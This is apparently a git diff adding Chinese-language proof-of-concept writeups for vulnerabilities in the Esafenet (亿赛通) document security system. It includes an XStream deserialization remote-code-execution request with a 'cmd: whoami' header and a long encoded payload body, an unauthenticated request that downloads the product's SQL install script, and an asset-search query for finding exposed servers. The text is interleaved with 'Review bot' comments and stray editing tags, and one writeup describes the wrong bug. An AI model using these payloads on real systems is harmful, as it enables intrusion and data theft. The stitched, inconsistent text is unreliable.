DKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJ
LHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706606838207-3eed0552-fc5c-4e7e-8998-7b3cc4bc2462.png](./img/gYpaKKfdS_r9zElE/1706606838207-3eed0552-fc5c-4e7e-8998-7b3cc4bc2462-925867.png) + + + +> 更新: 2024-04-20 22:01:32 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xklz84g3eqsd623r> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统create_SmartSec_mysql信息泄露.md b/亿赛通电子文档安全管理系统create_SmartSec_mysql信息泄露.md new file mode 100644 index 0000000..406ff7f --- /dev/null +++ b/亿赛通电子文档安全管理系统create_SmartSec_mysql信息泄露.md 
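Review bot: the body of the xstream PoC that ends just above is a multi-kilobyte run of the letters A to P with nothing in the file saying how it was produced, which gadget chain it carries, or how to decode it, so a reader can neither audit it nor adapt it; add one sentence naming the generator tool and the encoding (or link to them) and state what observable effect confirms that the payload executed. The identical blob is pasted again verbatim in the docRenewApp and formType files of this same commit (the text at the end of one copy continues seamlessly into the start of the next), so keep one copy or reference the generator instead of duplicating 14 KB per file. Minor: every file in this commit ends with "\ No newline at end of file"; add the trailing newline.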
@@ -0,0 +1,32 @@ +# 亿赛通 电子文档安全管理系统 create_SmartSec_mysql信息泄露 + +# 一、漏洞简介 +亿赛通电子文档安全管理系统是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/1GlZaQKLE2cGUVGj/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-425256.png) + +# 四、漏洞复现 +```plain +GET /CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql HTTP/1.1 +Host: xxx.xxx.xxx.xxx +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![1710086299125-e7611d63-bf75-4545-9198-b1f8360a83ba.png](./img/1GlZaQKLE2cGUVGj/1710086299125-e7611d63-bf75-4545-9198-b1f8360a83ba-948062.png) + + + +> 更新: 2024-04-20 22:01:30 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fforzmhq7r1n8vnz> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统docRenewApp存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统docRenewApp存在xstream反序列化漏洞.md new file mode 100644 index 0000000..226146a --- /dev/null +++ b/亿赛通电子文档安全管理系统docRenewApp存在xstream反序列化漏洞.md 
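Review bot: in the create_SmartSec_mysql file, the last sentence of the 漏洞简介 paragraph ("亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载") describes a different issue from the one this file documents, an unauthenticated `GET /CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql`; it reads as copied from another writeup and should say that the product's database installation script is directly downloadable. The 漏洞复现 section gives the request but not what a vulnerable response contains; one line stating what to look for (for example, the SQL DDL of the product schema in the response body) would let a reader confirm a hit without relying on the screenshot.
</gre_insert>
<gr_insert after="994" cat="add_content" orig="EKELIPFFLJNNB">
Review bot: in the docRenewApp request, the body is an opaque 14756-byte letter blob (`Content-Length: 14756`) and the `cmd: whoami` header is the only hint that the command is taken from a request header, but nothing in the text says so or shows how the payload consumes it; state what the blob is (the XStream gadget chain, the encoding, and the tool that generated it) and what evidence shows that `whoami` actually ran, otherwise a reviewer cannot verify that the `cmd` header is used at all. The request also hard-codes a lab address, `Host: 192.168.110.187:8090`, while the other files in this commit use a placeholder (`xxx.xxx.xxx.xxx` or an empty `Host:`); replace it with a placeholder.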
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统docRenewApp存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统docRenewApp存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/d0a2xi_uNq20Xpju/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-228517.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/docRenewApp HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCD
JBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKI
JKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNO
KMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIP
BJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKI
OKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJH